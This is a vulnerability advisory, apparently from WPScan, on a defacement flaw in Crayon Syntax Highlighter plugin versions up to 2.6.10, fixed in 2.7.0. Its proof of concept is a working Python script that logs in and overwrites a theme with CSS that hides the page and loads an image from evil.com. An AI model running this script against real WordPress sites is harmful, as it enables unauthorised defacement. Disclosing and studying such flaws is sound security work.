Crayon Syntax Highlighter 2.0 - 2.6.10 - Defacement

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The Crayon Syntax Highlighter plugin allows access to the AJAX method 'crayon-theme-editor-save' to any registered user. When called, the AJAX method ‘crayon-theme-editor-save’ will call the 'save' function within the CrayonThemeEditorWP class, defined in 'crayon-syntax-highlighter/util/theme-editor/theme_editor.php'. An attacker can craft the user provided parameters in such a way that it becomes possible to overwrite base themes with arbitrary CSS.
Proof of Concept
import requests
s = requests.session()
target = 'http://localhost'

url = '%s/wp-login.php'%target
payload = {
        "log":"test",
        "pwd":"test",
        "wp-submit":"Log+In"
}
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
        "action":"crayon-theme-editor-save",
        "id":"classic",
        "name":"Classic",
        "css":"body>*{display:none}nbody::after{content:'testing'}nhtml{background-image:url(http://evil.com/myimage.jpg)}",  
        "version":"2.6.10",
        "allow_edit":1,
        "allow_edit_stock_theme":1
}
r = s.post(url, data=payload)

Affects

Plugin crayon-syntax-highlighter
fixed in version 2.7.0

References

URL https://research.g0blin.co.uk/g0blin-00044/

Classification

Type BYPASS

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 223
Verified No
WPVDB ID 7912

Timeline

Publicly Published 2015-04-20 (over 1 year ago)
Added 2015-04-20 (over 1 year ago)
Last Updated 2015-05-15 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.